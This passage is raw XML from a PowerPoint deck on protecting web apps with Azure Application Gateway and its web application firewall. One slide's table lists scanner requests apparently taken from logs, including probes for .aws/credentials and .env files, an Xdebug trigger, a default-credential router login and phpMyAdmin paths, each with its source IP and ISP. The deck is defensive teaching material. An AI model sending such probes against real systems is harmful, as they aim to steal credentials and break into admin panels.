                        <a:t>aws</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
                        <a:t>credentials</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-CH" sz="1600" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
                        <a:t>demo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                        <a:t>/.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
                        <a:t>env</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-CH" sz="1600" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                        <a:t>/web/.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
                        <a:t>env</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-CH" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t>109.237.97.180 </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1400" dirty="0"/>
                        <a:t>LLC Company </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1400" dirty="0" err="1"/>
                        <a:t>Interlan</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1400" dirty="0"/>
                        <a:t> Communications</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t>GB -&gt; Russia</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4174458415"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                        <a:t>/?XDEBUG_SESSION_START=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
                        <a:t>phpstorm</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-CH" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t>152.89.196.211 </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1400" dirty="0" err="1"/>
                        <a:t>Starcrecium</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1400" dirty="0"/>
                        <a:t> Limited</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t>Russia -&gt; Cyprus</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1153468836"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
                        <a:t>boaform</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
                        <a:t>admin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
                        <a:t>formLogin?username</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                        <a:t>=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
                        <a:t>user&amp;psd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                        <a:t>=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
                        <a:t>user</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-CH" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t>118.252.86.68</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1400" dirty="0" err="1"/>
                        <a:t>ChinaNet</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1400" dirty="0"/>
                        <a:t> Hunan Province Network </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t>China</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1672682"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="431524">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
                        <a:t>administrator</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                        <a:t>/phpMyAdmin/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
                        <a:t>index.php?lang</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                        <a:t>=en</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
                        <a:t>db</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                        <a:t>/phpMyAdmin3/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
                        <a:t>index.php?lang</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                        <a:t>=en</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
                        <a:t>mysql</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
                        <a:t>admin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
                        <a:t>index.php?lang</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1600" dirty="0"/>
                        <a:t>=en</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t>183.77.131.179</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" sz="1400" dirty="0"/>
                        <a:t>Asahi Net Inc. </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t>Japan</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3170586703"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1280520409"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="BjornVTI">
  <a:themeElements>
    <a:clrScheme name="AnalogousFromDarkSeedLeftStep">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="1B302A"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="F0F3F2"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="C34D7E"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="B13B9E"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="A54DC3"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="6943B5"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="4D57C3"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="3B76B1"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="4A3F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2514</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Breitbild</PresentationFormat>
  <Paragraphs>360</Paragraphs>
  <Slides>55</Slides>
  <Notes>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55</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="63" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Neue Haas Grotesk Text Pro</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>BjornVTI</vt:lpstr>
      <vt:lpstr>Azure Application GAteway</vt:lpstr>
      <vt:lpstr>Swiss software provider for health insurance software solutions</vt:lpstr>
      <vt:lpstr>Announcements of Microsoft Build 2022</vt:lpstr>
      <vt:lpstr>Revenue from cloud computing* worldwide from 2010 to 2021 and forecast to 2023</vt:lpstr>
      <vt:lpstr>Todays topic</vt:lpstr>
      <vt:lpstr>Staring Point</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>The new system in the cloud</vt:lpstr>
      <vt:lpstr>Request list</vt:lpstr>
      <vt:lpstr>Azure Application Gateway</vt:lpstr>
      <vt:lpstr>Features</vt:lpstr>
      <vt:lpstr>Protecting our System</vt:lpstr>
      <vt:lpstr>TLS/SSL on AGW</vt:lpstr>
      <vt:lpstr>Protecting our System</vt:lpstr>
      <vt:lpstr>Security</vt:lpstr>
      <vt:lpstr>OWASP Top 10</vt:lpstr>
      <vt:lpstr>Web Application Firewall</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>WAF Prevention mode</vt:lpstr>
      <vt:lpstr>Protecting our System</vt:lpstr>
      <vt:lpstr>Restricted Access</vt:lpstr>
      <vt:lpstr>Our setup</vt:lpstr>
      <vt:lpstr>Load Balancing</vt:lpstr>
      <vt:lpstr>Load Balancing</vt:lpstr>
      <vt:lpstr>Routing</vt:lpstr>
      <vt:lpstr>Url Based Routing</vt:lpstr>
      <vt:lpstr>Image without rewrite and without additional virtual path</vt:lpstr>
      <vt:lpstr>The HTML</vt:lpstr>
      <vt:lpstr>Add Virtual Path</vt:lpstr>
      <vt:lpstr>Virtual Path fixed, but…</vt:lpstr>
      <vt:lpstr>Update Configuration</vt:lpstr>
      <vt:lpstr>Done!</vt:lpstr>
      <vt:lpstr>URL Rewrite possibilites</vt:lpstr>
      <vt:lpstr>Pricing</vt:lpstr>
      <vt:lpstr>Azure Calculator</vt:lpstr>
      <vt:lpstr>Billing</vt:lpstr>
      <vt:lpstr>Issue #33601</vt:lpstr>
      <vt:lpstr>Azure Calculator</vt:lpstr>
      <vt:lpstr>Best Practices</vt:lpstr>
      <vt:lpstr>Log requests</vt:lpstr>
      <vt:lpstr>Monitoring</vt:lpstr>
      <vt:lpstr>Decline weak TLS/SSL cipher</vt:lpstr>
      <vt:lpstr>HTTP Response Header</vt:lpstr>
      <vt:lpstr>Do use latest recommendations</vt:lpstr>
      <vt:lpstr>Why to put the certificate in a Key Vault?</vt:lpstr>
      <vt:lpstr>Don’t use Path based Routing Use Multisite Routing</vt:lpstr>
      <vt:lpstr>DDoS protection</vt:lpstr>
      <vt:lpstr>Fine Tuning</vt:lpstr>
      <vt:lpstr>Custom error pages</vt:lpstr>
      <vt:lpstr>Custom error pages</vt:lpstr>
      <vt:lpstr>Features</vt:lpstr>
      <vt:lpstr>Takeaways</vt:lpstr>
      <vt:lpstr>Key Takeaways</vt:lpstr>
      <vt:lpstr>Last but not least - Disclaimer</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Application GAteway</dc:title>
  <dc:creator>Marko Markovic</dc:creator>
  <cp:lastModifiedBy>Marko Markovic</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-12-01T11:57:30Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-12-16T10:22:12Z</dcterms:modified>
</cp:coreProperties>
</file>